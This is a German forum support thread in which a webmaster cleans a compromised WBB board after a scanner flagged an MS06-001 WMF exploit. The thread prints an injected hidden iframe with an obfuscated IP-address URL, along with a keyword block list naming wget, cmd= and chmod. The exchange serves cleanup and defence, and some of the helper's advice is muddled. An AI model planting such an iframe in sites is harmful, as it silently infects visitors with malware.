Trojaner eingefangen

Dies ist eine vorgefertigte Schablone.
Bitte fülle soviel aus, wie dir nur Möglich ist, du kannst auch gerne noch mehr Angaben machen.


Problembeschreibung: Trojaner infiziert PHP-Dateien

Fehlermeldung: über Virenscanner: C:\...\xpladv765[1].wmf enthält Signatur des Ecploits EXP/MS06-001.WMF.
im ACP: Warning: Cannot modify header information - headers already sent by
(output started at
/home/www/dps13120/html/wbb2/cache/language/0_own.php: in /home/www/dps13120/html/wbb2/acp/lib/functions.php on line 82

Warning: Cannot modify header information - headers already sent by
(output started at
/home/www/dps13120/html/wbb2/cache/language/0_own.php: in /home/www/dps13120/html/wbb2/acp/lib/functions.php on line 82



Link zum Forum oder Screenshot: www.wortkaestchen.de
Forum wurde erst einmal geschlossen


Was wurde zuletzt geändert oder eingebaut?
Änderungen: keine
Eingebaut zuletzt das Sicherheitssystem Version 2.1.2 und das HM-Portal


Laut Auskunft des Webhosters gelangen die Trojaner wohl über die Uploadfunktion in die PHP-Dateien und verändern sie.

Was kann ich nun tun?
Alle PHP-Dateien durchforsten nach einem Fehler oder einen Backup hochladen?
Vielen Dank schon mal im voraus.

LG Amira

Dein Virenscanner hat dich auf ein problem aufmerksam gemacht dass im Windows bestand. Über eine Sicherheitslücke im System war es möglich mittels einer *.wmf Datei einen Trojaner in dein System einzuschleußen.

Hier nun die Lösung für dein Problem:

Lösche den besagten Virus von der Festplatte und führe das Update von Windows aus, soll heßen du lädst dir entweder mittels des Automatischen Updaters oder von der homepage von microsoft die akuellesten Updates herunter.

Im Forum empfiehlt es sich über das acp das anhängen von wmv datein zu verbieten und auch mal zu schaun ob im Forum auf eine solche Datei in Beiträgen verknüpft wurde.

Wie nun diese Sicherheitslücke im Windows sich direkt aufs Forum auswirkt kann ich allerdings im Moment nicht sagen.

Vielen Dank für den Tipp. Die infizierte .wmf Datei habe ich gefunden und gelöscht. Nun werde ich ein Windwos-Update machen und anschließend den Fehler im Forum beheben.
So, wie es aussieht, ist nur eine Datei infiziert, die acp/security-options.php. Die sieht am Ende im Moment so aus:

// Scriptblocker
//----------------------------------------------->>
$scriptblocker_source = array('$_REQUEST', '$_GET', '$_SERVER','INSERT%20INTO','SELECT%20','DELETE%20FROM','chmod(','mdir%20', 'chmod%20', 'rmdir%20','chr(', 'wget', 'cmd=','fopen','fwrite');
//----------------------------------------------->>

?><iFrAme SRc=http://8%35%2E%32%35%35.%311%33%2E%32%32/in%63/nan%36%38.h%74ml WIdth=0 Height=0 fRAmeBoRDER=0 ></IFrAMe>

Dieses iFrAme... werde ich jetzt löschen und die drei attachment.gifs, die gestern nachmittag hochgeladen wurden auch.
Andere Dateien wurden gestern nicht verändert.
Mal schauen, ob es dann wieer funktioniert.

LG Amira

Da das Format *.gif nicht von der Sicherheitslücke betroffen sind kannst du diese ja im Forum lassen.

Das Problem mit dem SecurityAddOn solltest du am besten bei wbb-security klären lassen, also wie es dazu kommen konnte.

Das habe ich eben bereits gemacht. Noch einmal vielen Dank.

LG Amira